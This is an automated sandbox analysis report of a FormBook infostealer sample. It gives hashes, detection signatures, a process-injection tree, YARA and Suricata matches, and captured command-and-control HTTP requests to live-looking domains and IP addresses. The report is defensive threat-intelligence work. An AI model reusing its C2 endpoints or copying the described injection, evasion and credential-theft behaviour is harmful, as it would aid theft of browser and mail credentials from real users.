Windows Analysis Report
BcF3o0Egke.exe

Overview

General Information

Sample name: BcF3o0Egke.exe
renamed because original name is a hash value
Original sample name: c050dff0d7a2ba85b874106f24dd24687525f4ef7fd20485d3fb5660564ba6b5.exe
Analysis ID: 1588352
MD5: a04f2271ad163c1098d3ca9c311b53d0
SHA1: 4c3b52a43f8a0d4e29ab25342bd6cb19d4eb8442
SHA256: c050dff0d7a2ba85b874106f24dd24687525f4ef7fd20485d3fb5660564ba6b5
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BcF3o0Egke.exe (PID: 432 cmdline: "C:\Users\user\Desktop\BcF3o0Egke.exe" MD5: A04F2271AD163C1098D3CA9C311B53D0)
    • BcF3o0Egke.exe (PID: 3780 cmdline: "C:\Users\user\Desktop\BcF3o0Egke.exe" MD5: A04F2271AD163C1098D3CA9C311B53D0)
    • BcF3o0Egke.exe (PID: 6020 cmdline: "C:\Users\user\Desktop\BcF3o0Egke.exe" MD5: A04F2271AD163C1098D3CA9C311B53D0)
      • ysdBLufRFxAq.exe (PID: 3628 cmdline: "C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 1436 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • ysdBLufRFxAq.exe (PID: 1240 cmdline: "C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5564 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches (memory dumps):
Source | Rule | Description | Author | Strings
00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Yara matches (unpacked PE):
Source | Rule | Description | Author | Strings
5.2.BcF3o0Egke.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.BcF3o0Egke.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

                AV Detection

                Source: BcF3o0Egke.exeAvira: detected
                Source: https://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7UvfAvira URL Cloud: Label: malware
                Source: http://www.cssa.auction/rjvg/Avira URL Cloud: Label: malware
                Source: http://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8Avira URL Cloud: Label: malware
                Source: BcF3o0Egke.exeVirustotal: Detection: 70%
                Source: BcF3o0Egke.exeReversingLabs: Detection: 95%
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: BcF3o0Egke.exeJoe Sandbox ML: detected
                Source: BcF3o0Egke.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: BcF3o0Egke.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: GpHAn.pdb source: BcF3o0Egke.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ysdBLufRFxAq.exe, 00000006.00000000.2366003816.000000000070E000.00000002.00000001.01000000.0000000C.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2522895331.000000000070E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: BcF3o0Egke.exe, 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2448577877.0000000003450000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2445542520.00000000032A4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BcF3o0Egke.exe, BcF3o0Egke.exe, 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2448577877.0000000003450000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2445542520.00000000032A4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000002.3935408819.0000000001358000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: GpHAn.pdbSHA256 source: BcF3o0Egke.exe
                Source: Binary string: regini.pdb source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000002.3935408819.0000000001358000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E1C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_02E1C8D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then xor eax, eax7_2_02E09E40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then mov ebx, 00000004h7_2_039504D8

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49926 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49996 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 209.74.77.109:80
                Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
                Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                Source: Joe Sandbox ViewASN Name: BTEL-BG-ASBG BTEL-BG-ASBG
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /p8wp/?e6sH8=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrnkRY0wlRdLQOsYcJNWRSxCeXfXL0akVDuIK46RTRxpICeg==&rr=BbldmNsp8 HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /47f1/?e6sH8=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8CpTp0QkkBq1y4sNZ2ldFAdykoca83krEGIrLt+evp31gA==&rr=BbldmNsp8 HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4iun/?rr=BbldmNsp8&e6sH8=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpuauCK8BCe9zqr6jRwciKumWtZPYXukZtwjz9MdHPx1eFIw== HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /lazq/?e6sH8=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVVX0RGb+5s2kSkhaf40FF0423J1jVorSDRX3Mt1+1Y+N0g==&rr=BbldmNsp8 HTTP/1.1Host: www.hm35s.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /2lci/?rr=BbldmNsp8&e6sH8=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNCiHfOCZyv1qYWJ1bwu2fvFY8APk0KaeRNG0Pv4PAhLvZA== HTTP/1.1Host: www.snehasfashion.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /s7xt/?e6sH8=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA9TJ417GC4aJAohl/0/HIB1aq1+GW1q6O2aRbrP6PH2e8rA==&rr=BbldmNsp8 HTTP/1.1Host: www.sitioseguro.blogAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /gybb/?rr=BbldmNsp8&e6sH8=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4IQcXwxluILOpqvLxjlac2zTW2ZjXnd6ITs8lfiKZkyKwA== HTTP/1.1Host: www.windsky.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8 HTTP/1.1Host: www.cssa.auctionAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4r26/?e6sH8=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80etZ5Cy+PRwnxMf10/xPOo/zDftN59BIXLil1jV1mDemi+A==&rr=BbldmNsp8 HTTP/1.1Host: www.moviebuff.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rfcw/?e6sH8=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg87VqMj4zR8JAo57t+O519z31L6J8d3g4D3wlhoIiupxBhw==&rr=BbldmNsp8 HTTP/1.1Host: www.whisperart.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.bookingservice.center
                Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: global trafficDNS traffic detected: DNS query: www.snehasfashion.shop
                Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global trafficDNS traffic detected: DNS query: www.windsky.click
                Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                Source: global trafficDNS traffic detected: DNS query: www.moviebuff.info
                Source: global trafficDNS traffic detected: DNS query: www.whisperart.net
                Source: unknownHTTP traffic detected: POST /47f1/ HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bookingservice.centerContent-Length: 206Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.bookingservice.center/47f1/User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 00:21:36 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Server: Microsoft-IIS/10.0
                X-Powered-By: ASP.NET
                X-Frame-Options: SAMEORIGIN
                Date: Sat, 11 Jan 2025 00:21:51 GMT
                Connection: close
                Content-Length: 1245
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Server: Microsoft-IIS/10.0
                X-Powered-By: ASP.NET
                X-Frame-Options: SAMEORIGIN
                Date: Sat, 11 Jan 2025 00:21:54 GMT
                Connection: close
                Content-Length: 1245
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Server: Microsoft-IIS/10.0
                X-Powered-By: ASP.NET
                X-Frame-Options: SAMEORIGIN
                Date: Sat, 11 Jan 2025 00:21:56 GMT
                Connection: close
                Content-Length: 1245
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Server: Microsoft-IIS/10.0
                X-Powered-By: ASP.NET
                X-Frame-Options: SAMEORIGIN
                Date: Sat, 11 Jan 2025 00:21:58 GMT
                Connection: close
                Content-Length: 1245
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Sat, 11 Jan 2025 00:22:05 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Sat, 11 Jan 2025 00:22:08 GMT
